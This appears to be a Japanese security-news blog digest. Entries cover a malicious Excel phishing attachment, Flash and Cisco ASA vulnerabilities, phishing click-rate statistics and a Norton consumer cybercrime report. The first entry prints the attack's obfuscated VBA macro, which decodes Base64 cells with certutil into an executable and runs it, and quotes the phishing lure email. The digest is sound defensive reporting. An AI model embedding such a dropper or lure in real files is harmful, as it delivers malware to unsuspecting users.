2018-02-03: セキュリティニュースまとめ: 悪意のあるマクロを含む Excel シートによる単純だが効果的な攻撃方法
悪意のあるマクロを含む Excel シートによる単純だが効果的な攻撃方法
元記事 SANS ISC InfoSec Forums
- Simple but Effective Malicious XLS Sheet - SANS Internet Storm Center
- 元原稿著者: Xavier Mertens (@xme) 氏
概要
- あるフィッシング攻撃に利用されていたマクロ入り Excel ファイルが単純だが非常に効果的な方法を採用していたので紹介
- 検体は HIS Markit が運営する Jane's 360 サイトからであることを偽装したメール
フィッシングメールの文面
Greetings!
Attached you can find Upcoming Defense, Military and Intelligence event calendar.
Note: If you have trouble viewing the document you can try to enable content to resolve the issue.
Regards,
Jane's 360 By IHS Markit
IHS Global Limited: Registered in England under company number 00788737. Registered office: The Capitol Building, Oldbury, Bracknell, Berkshire, RG12 8FZ, UK.This email message, including accompanying communications and attachments, is strictly confidential, for the sole use of the intended recipient(s) and may contain privileged information. Any unauthorized use, review, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message. Thank you.
Please consider the environment before printing this e-mail.
添付ファイル名
- Upcoming Events February 2018.xls
- SHA1: b06930c9809ab5e4cb6659089ac6fcec470c9c16 (VirusTotal では検出なし)
以下の YARA ルールに抵触する
埋め込まれている VBA マクロについて
- Microsoft Windows 組み込みのツールを使って攻撃している
- Excel ファイルの悪意のあるペイロードは、複数のセルに Base64 でエンコードされて格納されている
- 関数でこれらのセルの内容を読み込み、つなぎ合わせることで特定の文字列を生成する仕組み
Function GetVal(sr As Long, er As Long, c As Long) Dim x For i = sr To er x = x + Cells(i, c) Next GetVal = x End Function … p = GetVal(2227, 2248, 170)
- エンコードされている文字列の先頭が「TV(oA|pB|pQ|qA|qQ|ro)」ならそのファイルは Windows PE ファイル
- 生成された文字列をデコードするのに PowerShell か VB を使っても良いが、同じ用途で certutil.exe が使える
- このケースでは偽の証明書ファイルが生成され certutil.exe に渡される
- 以下は整形してある
Sub cutil(code As String) Dim x As String x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----" x = x + vbNewLine x = x + code x = x + vbNewLine x = x + "-----E" & "ND CERTIF" & "ICATE-----" Dim path As String Dim expath As String Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject") path = "C:\Programdata\" & GetRand & ".txt" expath = "C:\Programdata\" & GetRand & ".exe" Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject") Set file = scr.CreateTextFile(path, True) file.Write x file.Close Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _ Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath) // Decoded command: // certutil -decode C:\Programdata\<random>.txt C:\Programdata\<random>.exe Sleep 2000 // Let’s launch our payload! Shell (expath) End Sub
Windows PE ファイル
- SHA256: ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8
- VirusTotal では検出なし
まとめ
- マルウェアの拡散に悪意のあるコンテンツを HTTP 経由でダウンロードせずに済むので検出を回避しやすい
参考リンク
- Microsoft BITS (Background Intelligent Transfer Service) ツールを利用する活動の調査 (https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/)
- certutil.exe について
2018-02-02: セキュリティニュースまとめ: Adobe Flash Player にゼロデイ脆弱性 CVE-2018-4878
Adobe Flash Player にゼロデイ脆弱性 CVE-2018-4878
ソース
KISA からのセキュリティ情報 www.krcert.or.kr
報告者 Simon Choi 氏のツイート
Flash 0day vulnerability that made by North Korea used from mid-November 2017. They attacked South Koreans who mainly do research on North Korea. (no patch yet) pic.twitter.com/bbjg1CKmHh
— Simon Choi (@issuemakerslab) 2018年2月1日セキュリティアドバイザリ (Adobe) helpx.adobe.com
概要
- Adobe Flash Player に新規の脆弱性 注意勧告 2018.01.31
- Adobe Flash Player にゼロデイ脆弱性が発見される
- 攻撃者は細工をした Flash ファイルが含まれている Microsoft Office 文書、Web ページ、迷惑メールなどをユーザーが開くように誘導して悪意のあるコードを配布する可能性がある
脆弱性関連情報
脆弱性のカテゴリ | 影響度 | 深刻度 | CVE 番号 |
---|---|---|---|
Use-after-free (解放後のメモリ使用) | リモートからのコード実行 | 致命的 | CVE-2018-4878 |
影響を受ける製品とバージョン (Adobe)
製品 | バージョン | プラットフォーム |
---|---|---|
Adobe Flash Player Desktop Runtime | 28.0.0.137 およびそれ以前 | Windows, Macintosh |
Adobe Flash Player for Google Chrome | 28.0.0.137 およびそれ以前 | Windows, Macintosh, Linux, Chrome OS |
Adobe Flash Player for Microsoft Edge および Internet Explorer 11 | 28.0.0.137 およびそれ以前 | Windows 10, 8.1 |
Adobe Flash Player Desktop Runtime | 28.0.0.137 およびそれ以前 | Linux |
修正パッチ
回避方法
削除方法
ベストプラクティス
- 怪しいウェブサイトを訪問しない
- 送信者不明おメールに添付されているファイルを閲覧せず、URL リンクを開かない
- 使用しているデスクトップ AV ソフトウェアの定義ファイル(パターンファイル) を最新にする
- リアルタイム監視機能を有効にする
- Flash が有効な Internet Explorer (IE) のユーザーは影響を受けるため、パッチがリリースされるまでは Flash が無効に設定されている Chrome、Firefox を使用する
これまでに確認されている悪用
2018-02-01 セキュリティニュース: Cisco ASA のソフトウェアにリモート コード 実行およびサービス拒否の脆弱性
Cisco ASA のソフトウェアにリモート コード 実行およびサービス拒否の脆弱性
一次ソース: Cisco Security Advisory
日本語版
https://www.cisco.com/c/ja_jp/support/docs/csa/2018/cisco-sa-20180129-asa1.pdf?dtid=osscdc000334
概要: Cisco 適応型セキュリティアプライアンス (ASA) ソフトウェアにリモートコード実行およびサービス拒否の脆弱性
- Cisco Adaptive Security アプライアンス (ASA) ソフトウェアの SSL (Secure Sockets Layer) の VPN 機能に脆弱性がある
- 当該脆弱性を悪用すると、リモートの攻撃者が不正に対象システムのリロードを行ったり、任意のコードを実行できるようになる
- 影響を受けるバージョンの Cisco の ASA デバイス上で webvpn 機能が有効になっていると、ある領域のメモリが二重解放されうる脆弱性がある 参考
- リモートの攻撃者は細工した XML パケットを複数 webvpn が有効になったインタフェースに送信することにより当該脆弱性を悪用することができる
- エクスプロイトにより攻撃者は任意のコードを実行し、システムを完全な制御下におき、脆弱性のあるデバイスをリロードさせることができる
- Cisco はすでに本脆弱性について修正版ソフトウェア(後述)をリリースしている
- 更新以外の回避策はなし
- 公式アドバイザリ
- 簡易日本語版
CVE
- 対応する CVE: CVE-2018-0101
- Cisco Bug ID: CSCvg35618
- CVSS スコア: 10.0
修正ソフトウェア
ASA
Cisco ASA メジャーリリース | 修正された最初のリリース |
---|---|
8.x1 | 影響あり、9.1.7.20 かそれ以降へ移行のこと |
9.01 | 影響あり、9.1.7.20 かそれ以降へ移行のこと |
9.1 | 9.1.7.20 |
9.2 | 9.2.4.25 |
9.31 | 影響あり、9.4.4.14 かそれ以降へ移行のこと |
9.4 | 9.4.4.14 |
9.51 | 影響あり、9.6.3.20 かそれ以降へ移行のこと |
9.6 | 9.6.3.20 |
9.7 | 9.7.1.16 |
9.8 | 9.8.2.14 |
9.9 | 9.9.1.2 |
FTD ソフトウェア
Cisco FTD メジャーリリース | 修正された最初のバージョン |
---|---|
6.2.2 未満 | 影響しない |
6.2.2[1] | Cisco_FTD_Hotfix_AB-6.2.2.2-4.sh.REL.tar (All FTD hardware platforms except 21xx)、Cisco_FTD_SSP_FP2K_Hotfix_AC-6.2.2.2-6.sh.REL.tar (21xx FTD hardware platform) |
[1] 6.2.2 未満のバージョンの FTD にはリモートアクセス VPN 機能がないため
修正ソフトウェア以外による回避策
なし
影響を受ける製品
- 3000 シリーズ産業セキュリティ アプライアンス モデル(ISA)
- ASA 5500 シリーズ適応型セキュリティ アプライアンス
- Cisco ASA 5500-X シリーズ次世代ファイアウォール製品群
- Cisco Catalyst 6500 シリーズ スイッチおよび Cisco 7600 シリーズ ルータ用の ASA サービス モジュール
- ASA 1000V クラウド ファイアウォール
- 適応型セキュリティ仮想アプライアンス(ASAv)
- FirePOWER 2100 シリーズ セキュリティ アプライアンス
- Firepower 4110 セキュリティ アプライアンス
- FirePOWER 9300 ASA セキュリティ モジュール
- Firepower Threat Defense ソフトウェア(FTD)
影響を受ける条件
上記該当製品の影響を受けるバージョンのソフトウェアを稼働しておりかつ webvpn が有効になっていること
影響を受けるかどうかを確認する方法
- CLI で管理者権限で以下のコマンドを実行して「webvpn」が返されるかどうか。返された場合は対象となる。
ciscoasa# show running-config webvpn
webvpn
- show asp table socket コマンドを実行し、443/tcp 上の SSL および DTLS のリッスンソケット有無についても確認する。当該脆弱性を悪用するには 443/tcp 上の SSL および DTLS のリッスンソケットが存在している必要があるため。
443/tcp 上のリッスンソケットの出力例:
ciscoasa# show asp table socket
Protocol Socket State Local Address Foreign Address
SSL 00005898 LISTEN 10.48.66.202:8443 0.0.0.0:*
TCP 00009718 LISTEN 10.48.66.202:23 0.0.0.0:*
TCP 0000e708 LISTEN 10.48.66.202:22 0.0.0.0:*
SSL 00011cc8 LISTEN 10.48.66.202:443 0.0.0.0:*
DTLS 000172f8 LISTEN 10.48.66.202:443 0.0.0.0:*
ASA ソフトウェアバージョンの確認方法
以下のコマンドを実行する
ciscoasa# show version | include Version
FTD ソフトウェアの場合
ciscoasa# show version
2018-01-27 セキュリティニュースまとめ: もっとも成功したフィッシング攻撃のテンプレとは
もっとも成功したフィッシング攻撃のテンプレとは
元記事
一次ソース (登録必要)
概要
- 各組織の情報セキュリティ担当に対するフィッシング攻撃に関してのアンケート結果
- 自組織がフィッシング攻撃を受けたと回答した情報セキュリティ担当者は 76% で 2016 年とほぼ横ばい
- 受信者のクリック率は 2016 年の 15% から 9% へ 6% 減少
フィッシング攻撃の 4 つの対象者カテゴリ
- 一般消費者、均的な一般人が受け取るカテゴリ
- 企業のカテゴリ
- 発注書、人事からのメッセージ、スパム検疫に関するメッセージ、福利厚生関連のエントリを促すメッセージなど
- コマーシャル
- ビジネス関連のフィッシングで、特定組織に紐付かないもの。出荷通知、電子送金依頼など
2017 年は上記 4 つのうち、一般消費者 と企業宛のメッセージが最も悪用され、攻撃全体にたいし前者が 44%、後者が 45% (2 カテゴリで 89%) をしめた
- 成功率が高いのはこの 2 つのカテゴリではなかった
最もクリック率が高かったフィッシングのテンプレ
以下はフィッシングメールのクリック率低下のために企業が行うトレーニング用シミュレーションで発覚したもの
- オンラインショッピングのセキュリティ更新通知: 受信者の 86% がクリック
- 企業宛にかかってきた知らない人からの伝言ボイスメール付きメール: 受信者の 86% がクリック
- 企業の電子メール改善に関するお知らせ: 受信者の 89% がクリック
- 「データベースのパスワードリセットに関するアラート」や「新しいビル避難訓練プランに関する通知」を含むメッセージはほぼ 100% のクリック率だった
まとめ
- 2016 年は企業宛のフィッシングが多数をしめたがしだいに一般消費者のフィッシングが多数派に
- 攻撃側が個人あてに戦術を変更した理由「企業メールと個人メールを受信環境をわけずに利用する機会が増えたことではないか」 *「個人と企業のメールをわけずに利用する人が多ければ、個人宛のメール経由でも企業のネットワークを狙うことができる」
- 「私用メールと企業メールをわけないことで、企業ネットワークに侵入するための攻撃面が拡大」
- 2018 年は情報セキュリティ担当者、IT 部門の担当者は利用者に個人メールと企業メールアカウントの利用をきちんと分けさせるよう教育し、企業アカウントを業務以外に使用させず、私用アカウントを業務に使用させないよう徹底すること
- 私用メールアカウントを業務端末に設定せず、スマートフォンなどに限定して使用するよう教育して企業ネットワークへの脅威の侵入を防ぐこと*1
2018-01-27 セキュリティニュースまとめ: インターネットが1時間利用できなくなったら損害額はどのぐらいか
インターネットが1時間利用できなくなったら損害額はどのぐらいか
元記事
レポートの一次ソース
一次ソースが報告作成にあたり利用した情報
https://www.emarketer.com/public_media/docs/eMarketer_eTailWest2016_Worldwide_ECommerce_Report.pdf Report for Selected Countries and Subjects
概要
ノートン サイバーセキュリティ インサイトレポート 2017 まとめ (2): 犯罪被害者ほど道徳上問題のある行動をとる傾向がある、基本的対策とは
前回までの内容
サイバー犯罪被害者の方が非被害者よりも道徳上グレーな行為を容認している
- グローバルで 81% の消費者は「サイバー犯罪は犯罪」と認識しているがその 43% が「道徳的に問題のあるオンラインでの行動」を自分がやっている
- グローバルで 26 % の消費者は、「他人のメールを同意を得ずに読むことは許容されうる場合がある」と回答
- グローバルで 21% の消費者は、偽のメールアドレスや他人のメールアドレスをオンラインで詐称することは許容されうる場合がある」と回答
- グローバルで 15% の消費者は、「他人の金融口座に同意を得ずにアクセスすることは許容されうる場合がある」と回答
- グローバルでサイバー犯罪被害者の 53% がこうした「道徳上問題がある行為」を容認しているが、サイバー犯罪の被害にあっていない人では 32% のみが容認している
- グローバルで 31% のサイバー犯罪被害者は、「他人のメールを同意を得ずに読むことは許容されうる場合がある」と回答しているが、非サイバー犯罪被害者では同じ回答をしたのは 18% のみ
- グローバルで 25% のサイバー犯罪被害者は、「オンラインで身分を詐称することは許容されうる場合がある」と回答しているが、非サイバー犯罪被害者では同じ回答をしたのは 14% のみ
- グローバルで 18% のサイバー犯罪被害者は、「他人の金融口座に同意を得ずにアクセスすることは許容されうる場合がある」と回答しているが、非サイバー犯罪被害者では同じ回答をしたのは 10% のみ
2017 年の度重なる侵害事件にもかかわらず、消費者は個人情報を預かる信用情報会社等の機構への信頼は失わない一方、政府への信頼は失う
- 消費者はグローバルで、個人情報を預かる以下のような組織に対し、従来と同じレベルの信頼を保ち続けている:
- 76% が ID 詐称対策サービスを信頼している
- 80% がインターネット サービス プロバイダを信頼している
- 80% がメール プロバイダを信頼している
- 82% が金融機関を信頼している
- 41% の消費者が政府が政府の保持するデータや個人情を保護できていないと考えている (=> 59% のみが政府を信頼している)
対策
基本的なことをないがしろにしない
- 基本に忠実に。顔認証や声紋認証は確かに効果的だが、それはパスワード認証などの基本的対策をきちんと行った場合にのみ効果を発揮する
- 公開されている情報に紐づくようなパスワードは使わず、自分自身は覚えやすく、十分に長く、他人はわからないランダムなパスワードを作成し、利用できるのであれば二段階認証や二要素認証を利用すればさらに悪用は難しくなる。またアカウントに侵害を通知する機能やログインのつど通知する機能があるかどうかを確認し、ある場合は有効にする。パスワードが侵害されたと通知があるか、見に覚えのないログインが確認された場合を除き、一定期間でパスワードを変更する必要はないだろう。また覚えるのが難しいと感じる場合はパスワード管理ソフトを利用するのが良い*1
- 公衆 WiFi の利用は慎重に。個人情報やアカウント情報を保護されていない WiFi で流さない。クレジットカード、ログイン、などの行為は行わない。やむなく公衆 WiFi 経由でそうした情報をやりとりする場合、最低限 VPN を利用すること。
- ルータや IoT 機器などは購入直後にデフォルトパスワードから変更すること。必要なければホーム用の IoT 機器はリモートからのログイン無効化をすること。ワイヤレス接続をする場合は WiFi の方式とパスワードを強力なものにして漏えいを防ぐこと。
- フィッシングメールにひっかからないこと。メールに添付されたファイルやリンクはとくに知らない人からの場合は開かない。知っている人からでも、相手の PC やメールアカウントが侵害されている可能性がある点に考慮すること*2。
- 所有しているデバイスに最新のセキュリティ対策を導入する*3
*1:フレーズからパスワードを作成する方法は案外ランダムにはならないため、筆者はお勧めしない。パスワードを覚えることなど最初から考えず、パスワード管理ツールの生成機能で生成した許容しうる限りの長さと複雑さの完全にランダムな文字列を利用する方がまだマシなパスワードができる。パスワード管理ソフトも信頼しないのであれば、生成だけ毎回パスワード管理ソフトにやらせて、ログインのつどパスワードリセットリクエストを送信するという使い方の方をするほうが良いだろう。二段階認証・二要素認証を利用できる場合たしかに利用することでセキュリティが強化できる場合もあるが SMS で6桁の数字を送信するなどの二段階認証しか用意していない場合、この仕組み自体を悪用することが可能なので、Google Authenticator や Octa などサードパーティの数値生成サービスが利用できる場合に利用するなども検討が必要。またパスワード管理ソフトを名乗るアプリの中には、パスワード窃取を目的としたマルウェアも出回っているため、評判が高く信頼のできる有料のものを利用すること。
*2:メールに添付されているファイルや文中のリンクは誰からのものであっても直接開かない方が良いと筆者は考える。送られてくることが期待されている文書をよく知っている送信者から受け取った場合でも、余裕があれば2-3日開けずにおいておき、スキャンさせてから開くほうがよいだろう。開く場合は一度プレビューで開き、拡張子の偽造やマクロの埋め込みなどがないかどうかを確認することが望ましい。文中のリンクはカーソルをロールオーバーし、本当に意図されたドメインに接続するかどうかを綴り間違いがないかを含めて確認すること。銀行やショッピングサイトなどからのメールであれば、文中リンクはいっさいクリックせず、ブックマークしているサイトや検索したサイトで表示されたリンクからアカウントにログインし、そこから内容を確認するのが望ましい
*3:一部の安価なスマートデバイスは、メーカー出荷時点ですでにハードウェア的にバックドアが仕込まれている場合があり、スマートデバイス上で対策をしても手遅れである場合がある。このため、後からつけたしで対策をするのではなく、どのようなスマートデバイスを選ぶかが重要となる。OS 自体が堅牢なエコシステムを持っているかどうか、セキュリティ更新が十分な頻度・速度で提供されているかに加え、サードパーティのストアからはアプリを入手しないなどの基本的対策もする必要がある
ノートン サイバーセキュリティ インサイトレポート 2017 まとめ (1): 2017 年のサイバー犯罪被害者は 9億7800万人、被害額は 1720 億ドル
一次ソース
2017 ノートン サイバーセキュリティ インサイトレポート: グローバル篇 2017 Norton Cyber Security Insights Report Global Results ※ レポートが長いため 5 回に分割
得られた知見
消費者は自身のサイバーセキュリティ知識について自信過剰
- 過剰な自信が自身を危険に晒し、サイバー犯罪者はその弱みにつけいって記録的成功をおさめる
- 2017 年は 20 カ国で 9 億 7800 万人がサイバー犯罪による影響を受けた
- 消費者の 44% が過去 12 ヶ月にサイバー攻撃による影響を受けた
- 消費者または消費者の知り合いが経験した最も一般的なサイバー犯罪には次のものがあげられる
- この結果、サイバー犯罪の犠牲となった被害者は全世界で 1720 億ドル (19兆円) の損害を受け、一人あたりの平均では 142 ドル (1万5千円) を失った
- また全世界で 24 時間近く (またはフルタイム勤務の 3 日分) の時間を後始末のために費やした
サイバー犯罪被害者はサイバーセキュリティについて言行不一致
- 口ではサイバーセキュリティの大切さを説きながら行動が伴わず結果的に自分自身をサイバー犯罪の危険にさらしている
- 被害者に見られる 3 つの特徴
- 自身のサイバーセキュリティスキルに自信過剰
- サイバー犯罪の被害者の方が被害にあわなかった人々よりもサイバーセキュリティの重要性をよく口にするが行動が伴わず単純なミスをしがち
- 消費者の 44% がサイバー犯罪被害にあっているが、被害者の 39% は自身の機密情報の保護に自信があり 33% は自身の行動はリスクが低いと信じている
- いくつものデバイスを愛用する
- 基本的な対策を怠る
- 自身のサイバーセキュリティスキルに自信過剰
ミレニアル世代 (2000 年以降生まれ)、その両親 (団塊ジュニア)、そしてベビーブーマー世代 (団塊世代) まで、全世代でセキュリティに関してほぼ「ノーガード戦法」
- ミレニアル世代
- 最もデジタル機器に慣れ親しんでいる世代で、最も多くのガジェットを所有している (平均 4 台)
- もっとも高度なセキュリティ対策を実施 (32%): パターンマッチング、顔認証、VPN、声紋認証、二要素認証など
- ところが単純なセキュリティ対策ミスもおかしがちで、パスワード管理がずさん(70%) でサイバー犯罪の被害者になりやすい
- 去年 1 年だけで全世界のミレニアル世代の 60% がサイバー犯罪被害にあっている
- 4 人に 1 人 (26%) のミレニアル世代ユーザーは同一パスワードをすべてのアカウントに使いまわしている (団塊世代では 10% のみ)
- 全世界でミレニアル世代の 63% が少なくとも 1 つ以上のパスワードを他者と共有している (団塊の世代では 36% のみ)
- 団塊の世代とそれより上の世代はもっとも安全な年齢グループだが失敗もおかす
- 団塊ジュニア世代は子どもとインターネットについては心配の種が多い